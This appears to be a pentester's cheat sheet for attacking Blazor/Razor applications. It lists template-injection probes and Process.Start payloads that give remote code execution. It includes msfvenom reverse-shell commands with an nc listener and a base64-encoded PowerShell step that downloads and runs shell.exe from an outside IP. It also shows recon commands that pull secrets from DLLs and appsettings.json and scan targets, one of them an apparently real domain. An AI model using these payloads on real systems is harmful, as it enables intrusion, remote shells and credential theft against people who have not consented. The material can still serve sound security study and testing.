Blazor SSTI
@(2+2) <= Success
@() <= Success
@("{{code}}") <= Success
@ <=Success
@{} <= ERROR!
@{ <= ERRROR!
@({}) <= ERROR!
@({{}}) <= ERROR!
@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");
@(System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test2.txt"));
Blazor RCE
https://www.schtech.co.uk/razor-pages-ssti-rce/
attacker: .\hostname.ps1
victim: @System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc <BASE64>");
Exploit:
x64: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.6.151 LPORT=4443 -f exe -o shell.exe
x86: msfvenom -p windows/shell_reverse_tcp LHOST=10.11.6.151 LPORT=4443 –f exe > shell.exe
nc -lvp 4443
#generatePayload.ps1 .\generatePayload.ps1
$command = 'iwr -uri http://192.168.2.111/shell.exe -OutFile C:\Windows\Tasks\shell.exe; C:\Windows\Tasks\shell.exe'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc <BASE64>");
Blazor Parse DLL
> python blazor.py -u https://devtest-chat.tweppy.com/
> python blazor.py -l targets.txt
> python blazor.py -l targets.txt -o output.txt
Download DLL files + Checking for leaked secrets
> python download.py
> python download.py -f result
> find . -name "*.dll" | xargs -P $(nproc) -n 1 strings >> juicy
> nuclei -target juicy -tags token -es unknown -silent
Blazor Config Files
http://domain.com/appsettings.json
http://domain.com/appsettings.StageName.json
ffuf -w bbFuzzing.txt -u http://domain.com/FUZZ
Nuclei
> nuclei -u http://domain.com -tags blazor -silent
> nuclei -l targets.txt -silent
Nuclei Secrets
> getJS --url targets.txt --output secrets.txt
> nuclei -l secrets.txt -tags token -es unknown -silent